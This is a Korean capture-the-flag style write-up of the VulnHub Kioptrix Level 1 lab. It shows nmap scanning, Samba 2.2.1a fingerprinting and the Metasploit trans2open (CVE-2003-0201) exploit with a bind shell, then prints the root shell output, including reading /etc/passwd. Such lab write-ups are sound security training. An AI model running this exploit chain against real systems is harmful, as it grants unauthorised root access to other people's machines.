
Kioptrix Level 1 분석글 - CVE-2003-0201 Samba trans2open
Kioptrix Level 1 분석 보고서 - CVE-2003-0201 Samba trans2open
저자: Amirbek Raxmatullayev (@americo_444)
날짜: 2026-06-17
플랫폼: VulnHub
난이도: 초급
목표: root 권한 획득
| 구성 요소 | 세부 정보 |
|---|---|
| 호스트 OS | Ubuntu 26.04 |
| 하이퍼바이저 | QEMU/KVM |
| 대상 | Kioptrix Level 1 (VMDK) |
| 공격자 IP | 192.168.56.1 |
| 대상 IP | 192.168.56.101 |
참고: VirtualBox는 DKMS KVM 네임스페이스 충돌로 인해 커널 7.0.0-22-generic과 호환되지 않았습니다. QEMU/KVM으로 전환하고 변환 없이 VMDK를 직접 로드했습니다.
qemu-system-x86_64 \
-m 512 \
-drive file="Kioptix Level 1.vmdk",format=vmdk \
-netdev bridge,id=net0,br=virbr0 \
-device e1000,netdev=net0 \
-display gtk
nmap -sn 192.168.56.0/24
결과: 대상이 192.168.56.101에서 식별됨
nmap -sV -sC -p- 192.168.56.101
열린 포트:
| 포트 | 서비스 | 버전 |
|---|---|---|
| 22/tcp | SSH | OpenSSH 2.9p2 |
| 80/tcp | HTTP | Apache 1.3.20 |
| 111/tcp | RPC | rpcbind 2 |
| 139/tcp | SMB | Samba 2.2.1a |
| 443/tcp | HTTPS | mod_ssl/2.8.4 |
| 32768/tcp | Status | RPC #100024 |
msfconsole -q -x "use auxiliary/scanner/smb/smb_version; \
set RHOSTS 192.168.56.101; run; exit"
결과: Samba 2.2.1a — 취약한 버전이 확인됨.
설명:
Samba 2.2.x 버전은 trans2open 함수에 스택 기반 버퍼 오버플로우 취약점이 있습니다. 이를 통해 인증되지 않은 원격 공격자가 root 권한으로 임의 코드를 실행할 수 있습니다.
영향을 받는 버전: Samba 2.0.x — 2.2.8
CVSS 점수: 10.0 (Critical)
익스플로잇 모듈: exploit/linux/samba/trans2open
msfconsole
use exploit/linux/samba/trans2open
set RHOSTS 192.168.56.101
set LHOST 192.168.56.1
set PAYLOAD linux/x86/shell_bind_tcp
run
왜 reverse_tcp 대신 bind_tcp를 사용했는가?
reverse_tcp 페이로드는 Kioptrix VM이 NAT/브리지 설정을 통해 공격자에게 다시 연결할 수 없었기 때문에 실패했습니다. bind_tcp를 사용하면 공격자가 대상에 연결하므로 피해자 측에서 나가는 연결이 필요하지 않습니다.
[*] Started bind TCP handler against 192.168.56.101:4444
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
...
[*] Command shell session 1 opened (192.168.56.1:36733 -> 192.168.56.101:4444)
셸 획득! ✅
whoami
# root
id
# uid=0(root) gid=0(root) groups=99(nobody)
hostname
# kioptrix.level1
uname -a
# Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
cat /etc/passwd
# root:x:0:0:root:/root:/bin/bash
# john:x:500:500::/home/john:/bin/bash
# harold:x:501:501::/home/harold:/bin/bash
시스템 정보:
[Attacker: 192.168.56.1]
|
| Step 1: nmap full port scan
v
[Target: 192.168.56.101]
|
| Step 2: Samba 2.2.1a identified
v
[Metasploit — trans2open exploit]
|
| Step 3: Stack buffer overflow triggered
v
[Bind shell opened on port 4444]
|
| Step 4: whoami = root
v
[TARGET PWNED]
nmap -sV -sC로 서비스 핑거프린팅bind_tcp와 reverse_tcp 페이로드의 차이점 및 각각을 사용해야 하는 경우| 도구 | 목적 |
|---|---|
| nmap | 포트 스캔, 서비스/버전 탐지 |
| Metasploit Framework | SMB 열거, 익스플로잇 |
| QEMU/KVM | 실습 가상화 |
| arp-scan | 호스트 탐색 |
작성자: Amirbek Raxmatullayev | BEK Coders Security Research | 2026